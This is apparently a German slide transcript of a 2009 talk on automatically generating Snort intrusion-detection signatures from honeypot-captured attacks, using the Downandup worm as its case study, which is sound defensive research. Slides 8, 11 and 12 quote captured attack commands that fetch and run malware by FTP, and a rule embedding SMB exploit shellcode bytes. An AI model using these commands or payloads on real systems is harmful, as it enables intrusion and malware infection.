Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Tillmann Werner Cyber Defence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung.

Ähnliche Präsentationen


Präsentation zum Thema: "Automatisches Generieren komplexer Intrusion-Detection-Signaturen Tillmann Werner Cyber Defence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung."—  Präsentation transkript:

1 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Tillmann Werner Cyber Defence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung 16. Februar 2009

2 Tillmann Wern erAFCEA: Cyber Defence Automatisches Generieren komplexer Intrusion-Detection-Signaturen Angriffe im Internet 2 Typischer Ablauf von Angriffen Scannen von Netzbereichen nach angreifbaren Rechnern Automatische, parallelisiere Systemkompromittierung Download des eigentlichen Schadprogramms Zusammenschluss übernommener Systeme zu Botnetzen Weitere Attacken C&C 0wned

3 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Fallbeispiel: Downandup-Wurm 3Tillmann Wern erAFCEA: Cyber Defence Fakten Verbreitet sich automatisch über Netzwerke Nutzt Schwachstelle im Server Service auf Windows-Systemen Lädt Schadprogramm auf kompromittierte Maschinen Schließt infizierte Computer zu einem Botnetz zusammen : Microsoft veröffentlicht außerplanmäßiges Advisory MS : PoC-Exploits im Internet verfügbar : Erste Exploits in Sensoren der Universität Bonn : Downandup : F-Secure: 9 Millionen infizierte Systeme weltweit : 70 Systeme der Royal Navy befallen (BBC News) : Intramar infizier – Jets der frz. Marine können nicht starten (Telegraph) : Pandalabs: 5,77% aller PC infiziert : Amtsgericht Houston für 4 Tage lahmgelegt : Microsoft setzt $ Kopfgeld aus : Hunderte Systeme der Bundeswehr befallen (Spiegel Online) ? ?

4 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Inhalt 4 Motivation Sensorik Signaturgenerierung Anwendung und Ausblick Tillmann Wern erAFCEA: Cyber Defence

5 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Motivation 5 Network Intrusion Detection Signaturen zur Erkennung und Blockade von Angriffen in Netzen Konzeptuelle Eigenschaft: Reaktiv per Definition Signatur: Formale Beschreibung spezieller Eigenschaften Dazu genaue Kenntnis von Angriffen nötig Ständig wechselnde Angriffstrends Manuelles Signatur-Engineering kann nicht Schritt halten Automatisierte Angriffe erfordern automatisierte Gegenmaßnahmen Signaturgenerierung Minimierung des Zeitfensters ohne Schutz Idee: Signaturen aus Angriffen berechnen Weitere Angriffe dann detektierbar Tillmann Wern erAFCEA: Cyber Defence

6 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Sensorik 6 Anforderungen Erfassen neuer Angriffstypen und –varianten Verteilte Sensorik, zentrale Auswertung Entkopplung Angriffserfassung und Signaturgenerierung Datenerfassung ist zeitkritisch Signaturgenerierung ist rechenintensiv Honeypots Spezielle Opfer-Systeme mit dem Ziel, angegriffen zu werden Erfassen möglichst viele Informationen zu jedem Angriff Können auch völlig unbekannte Attacken erfassen Wo ansetzen? Schwachstellen sind die Angriffsvektoren Ziel: Abwehr der initialen Attacke Tillmann Wern erAFCEA: Cyber Defence

7 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Überblick 7 Generierungsprozess Sensoren erfassen und übermitteln Angriffsdaten Automatische Klassifizierung Identifizieren invarianter Anteile Signatur-Komposition Format-Übersetzung Tillmann Wern erAFCEA: Cyber Defence

8 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Beispiel 8 cmd /c echo open >> ii &echo user 1 1 >> ii &echo get smc.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &smc.exe cmd /c echo open >> ii &echo user 1 1 >> ii &echo get crsss.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &crsss.exe cmd /c echo open >> ii &echo user 1 1 >> ii &echo get aglopmn.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &aglopmn.exe alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: ; rev: 1;) Tillmann Wern erAFCEA: Cyber Defence

9 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Automatische Klassifizierung 9 Angriffsklassen Ziel: Generiere eine Signatur pro Angriffsklasse Klasse: Menge aller ähnlichen Angriffe Ähnlichkeit definiert anhand syntaktischer Merkmale Automatische Klassifizierung (Clustering) Clustern eingehender Angriffe anhand Ähnlichkeit Graph-basierter Algorithmus Zusammenhangskomponenten repräsentieren Cluster Online-Verfahren, d.h. neue Klassen werden zur Laufzeit gebildet Tillmann Wern erAFCEA: Cyber Defence

10 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Identifizieren invarianter Anteile 10 Gemeinsame Substrings Gesucht: Substrings, die in allen Angriffen eines Clusters vorkommen Diese stellen gemeinsame Merkmale dar Signatur : Gemeinsame Substrings mit Positionsangaben 13 2 Finden aller gemeinsamen Substrings Algorithmus auf Basis von Generalized Suffix Trees Speziell für die Signaturgenerierung entwickelt Sehr effizient: O(n) bei n = Summe aller Angriffsbytes Tillmann Wern erAFCEA: Cyber Defence

11 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Komposition und Übersetzung 11 Signatur-Komposition Ziel: Möglichst lange Sequenz bilden Greedy-Algorithmus: Ergänzt sukzessive nächstlängsten Substring Ergebnis nicht notwendigerweise optimal Einfaches Optimieren wegen Mehrstufigkeit des Verfahrens Signatur-Übersetzung Generierte Roh-Signatur in der Praxis nicht einsetzbar Snort-Format: De-facto-Standard Syntax besitzt die benötigte Mächtigkeit alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: ; rev: 1;) Tillmann Wern erAFCEA: Cyber Defence

12 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Komposition und Übersetzung 12Tillmann Werner alert tcp any any -> any any (msg: "nebula rule rev. 4"; \ content: "| ff|SMBr| |S|c |7| |b|00 02|PC NETWORK PROGRAM 1.0|00 02|LANMAN1.0|00 02|Windows for Workgroups 3.1a|00 02|LM1.2X002|00 02| LANMAN2.1|00 02|NT LM 0.12| bf ff|SMBs| c |7| c ff a |~| d |~|10|`|82 10|z|06 06|+| a |n0|82 10|j|a |f#|82 10|b| |AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|03 00|#|82 0c|W| a 00 90|B|90|B|90|B|90|B|81 c4|T |f2 ff ff fc e8|F| b|E<|8b 7c 05|x|01 ef 8b|O|18 8b|_ |01 eb e3|.I|8b|4|8b 01 ee|1|c0 99 ac 84 c0 |t|07 c1 ca 0d 01 c2 eb f4|\;T|24 04|u|e3 8b|_|24 01 eb|f|8b 0c|K|8b|_|1c 01 eb 8b 1c 8b 01 eb 89|\\|24 04 c0|x|0f 8b|p|1c ad 8b|h|08 e9 0b c b|h<_1|f6|`V|eb 0d|h|ef ce e0|`h|98 fe 8a 0e|W|ff e7 e8 ee ff ff ff|cmd /c echo open "; depth: 1435; offset: 0; \ content: ">> ii &echo user "; distance: 13; within: 1473; \ content: "exe >> ii &echo bye >> ii &ftp -n -v -s\:ii &del ii &"; distance: 17; within: 127; \ content: "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#|0a f8 0f f8 0f 01|#|82 08|9| |CCCC |f0 fd 7f|SVWf|81 ec e6 e8 ed ff|6h|09 12 d6|c|e8 f |F|08 e8 a ff|v|04|hk|d0|+|ca e8 e |F|0c e8|?| ff|v|04|h|fa 97 02|L|e8 cd |1|db|h| |S|ff d0 89 c3|V|8b|v|10 89 c7 b f3 a4|^1|c0|PPPSPP|ff| V|0c 8b|F|08|f|81 c |_^[|ff e0|`|e8|#| b|D|24 0c 8d|X|7c 83|C<|05 81|C(| |c(|0 0 f0 ff ff 8b c4 14|P1|c0 c3|1|d2|d|ff|2d|89|\"1|db b8 90|B|90|B1|c9 b df f3 af|t|03|C|eb f3 89|~|10|d|8f 02|Xa|c3|`|bf| |f0 fd 7f 8b 1f 8b|F| b 7f f8 81 c7|x| f9|9|19|t|04 8b 09 eb f8 89 fa|9Z|04|t|05 8b|R|04 eb f |J|04 c6|C|fd 01|a|c3 a1 0c f0 fd 7f 8b|X| e 8b 00 89|F|04 c3|`|8b|l|24|(|8b|E<|8b|T|05|x|01 ea 8b|J|18 8b|Z |01 eb e3|8I|8b|4|8b 01 ee|1|ff|1| c0 fc ac|8|e0|t|07 c1 cf 0d 01 c7 eb f4|\;|7c 24 24|u|e1 8b|Z|24 01 eb|f|8b 0c|K|8b|Z|1c 01 eb 8b 04 8b 01 e8 89|D|24 1c|a|c eb fe|CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCC#|82 04| | eb |DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDD| |"; distance: 19; within: 2937; \ sid: ; rev: 4;)

13 Automatisches Generieren komplexer Intrusion-Detection-Signaturen Anwendung und Ausblick 13 Selbstschützende Netze Sensoren, Signatur-Generator und IDS im selben Netz Neue Regel bei neuen Angriffswellen Aktuell eher Forschungscharacter wegen Missbrauchsgefahr Werkzeug zur Angriffsanalyse Methode auch hilfreich bei manueller Angriffsanaylse Signatur beschreibt statische Anteile Schnelleres Verständnis von Angriffsdetails Ausblick Weitere Forschung nötig und möglich Verbesserung insbesondere durch mehr strukturelles Wissen über Angriffe Idee: Lernen von Dialogstrukturen zwischen Angreifer und Opfer Tillmann Wern erAFCEA: Cyber Defence

14 Fragen? Tillmann Werner Institut für Informatik IV Universität Bonn Römerstraße Bonn


Herunterladen ppt "Automatisches Generieren komplexer Intrusion-Detection-Signaturen Tillmann Werner Cyber Defence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung."

Ähnliche Präsentationen


Google-Anzeigen